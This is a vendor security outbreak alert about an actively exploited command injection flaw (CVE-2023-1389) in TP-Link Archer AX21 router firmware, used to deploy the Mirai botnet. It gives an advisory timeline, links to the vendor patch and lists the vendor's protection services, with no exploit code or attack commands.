virus logo Outbreak Alert

TP-Link Archer AX-21 Command Injection Attack

Released: May 23, 2023

Updated: Jun 21, 2023

Download PDF »

TP-Link Archer AX-21 Command Injection Attack Tags

Medium Severity

Routers Platform

Subscribe

Wifi Router vulnerability actively exploited

TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 contains a command injection vulnerability in the web management interface specifically in the "Country" field. There is no sanitization of this field, so an attacker can exploit it for malicious activities and gain foothold. The vulnerability has been seen to be exploited in the wild to deploy Mirai botnet. Learn More »

Common Vulnerabilities and Exposures


Background

TP-Link is one of the global provider of WLAN devices and Archer AX21 is a Wifi router which has been used in attacks to deploy Mirai botnet. Previously we have seen Mirai based botnet attack on various other IoT devices and routers from other brands. In Feb, 2023, FortiGuard labs released a report on active attacks on vulnerable routers from other brands such as D-Link, DSAN and Netgear. See Additional Resources for the full report.

Click here to analyze the

Real-Time Threat Map

Latest Development

Recent news and incidents related to cybersecurity threats encompassing various events such as data breaches, cyber-attacks, security incidents, and vulnerabilities discovered.


April 27, 2023: TP-Link released a security advisory.
https://www.tp-link.com/us/support/faq/3643/

May 1st, 2023: CISA added CVE-2023-1389 to its known exploited catalog (KEV).


May 09, 2023: FortiGuard Labs released a Threat signal on vulnerability.
https://www.fortiguard.com/threat-signal-report/5157

FortiGuard observed active attack attempts trying to exploit the TP-Link vulnerability (CVE-2023-1389). Fortinet customers remain protected by the IPS signature and recommends organizations to review the affected version of the TP-Link and apply patches as recommended by the vendor as soon as possible.
https://www.tp-link.com/ca/support/download/archer-ax21/v3/

FortiGuard Cybersecurity Framework

Mitigate security threats and vulnerabilities by leveraging the range of FortiGuard Services.


PROTECT

  • AV

  • AV (Pre-filter)

  • IPS

DETECT

  • IOC

  • Outbreak Detection

  • Threat Hunting

RESPOND

  • Assisted Response Services

  • Automated Response

RECOVER

  • InfoSec Services

IDENTIFY

  • Attack Surface Monitoring (Inside & Outside)

Threat Intelligence

Information gathered from analyzing ongoing cybersecurity events including threat actors, their tactics, techniques, and procedures (TTPs), indicators of compromise (IOCs), malware and related vulnerabilities.